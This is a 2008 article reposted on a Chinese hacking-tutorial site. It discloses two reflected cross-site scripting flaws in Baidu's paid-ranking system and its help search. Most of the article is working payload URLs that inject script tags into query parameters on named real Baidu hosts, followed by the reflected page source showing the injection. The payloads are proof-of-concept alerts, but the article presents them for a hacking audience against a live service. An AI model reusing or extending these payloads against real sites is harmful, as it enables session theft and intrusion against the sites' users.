黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·百度竞价排名多处XSS漏洞07-19·资源零占用 让桌面图标永07-19
·制作带有SATA驱动的XP安07-19·教你个人文档资料快速大07-19
·Windwos 服务器备份策略07-19·96先锋互联提供50M/ftp商07-19
·实实在在站长基地提供1007-18·如何安全保护路由器 防止07-17
·不安装摄像头 照样QQ/MS07-17·解决QQ收不到图片问题的07-17
·遇到删不掉的文件怎样处07-17·自己动手 打造安全个人系07-17
·中华最网提供50M/ftp全能07-17·九种破解windows XP登录07-16
·百度空间多处XSS漏洞续篇07-16·百度空间多处DOM XSS漏洞07-16
·久天网络免费提供200M全07-16·Vista下玩转光盘刻录:N07-15
·著名黑客工具CC攻击的思07-14·The Week of Baidu Bugs07-14
·The Week of Baidu Bugs07-14·The Week of Baidu Bugs07-14
·百度的JS数据流注入型跨07-14·百度贴吧标题XSS漏洞07-14
·硬盘分区成RAW格式无法访07-14·建站啦提供200M/asp/ftp07-13
·教你去掉Live Messenger07-12·Microsoft SQL Server S07-12
[组图]百度竞价排名多处XSS漏洞
        ★★★★★

百度竞价排名多处XSS漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-19 10:27:03

今天内容比较平淡,都是普通的XSS。

竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。

访问地址是: http://www2.baidu.com

但是这个系统和其他核心模块比起来,安全性要差上很多。

糟糕的验证码设计暂且不说,XSS方面几乎没有防范。

今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺

类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。

XSS 9: 百度竞价排名管理关键字 XSS 漏洞
漏洞链接如下:

以下是引用片段:
http://www2.baidu.com/query/query_mgr.php?gid=A&tp=A&pe=20&ob=status&sb=keyword&uid=1019083&sw=“><script>alert(/Keyword+XSS/)</script><”&cp=1&submit=1



代码如下:

以下是引用片段:
<form name=choice action=”" method=post><td align=center>
<select name=gid ><option value=”0″>我的关键字</option>
<option value=”A” selected>所有关键字组别</option>
</select>
……
<input name=sw size=10 value=”“><script>alert(/Keyword XSS/)</script><”“>
<input type=hidden name=cp value=”1″>

XSS 10: 百度竞价排名帮助搜索XSS
登录后,如下链接:

以下是引用片段:
http://sf-help.baidu.com/search?word=“><script>alert(/Search+XSS/);</script><”


代码如下:
以下是引用片段:
<form action=’/search’ method=’GET’ style=”margin:0px;padding:0px;”>
<div class=”tit_2″><strong>帮助搜索</strong></div>
<div class=”box_2″>
<input name=”word” type=”text” size=”19″ id=”s” value=”\”><script>alert(/Search XSS/);</script><\”“>
<input type=”submit” name=”Submit” value=”搜索”>
</div>
</form>

 

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886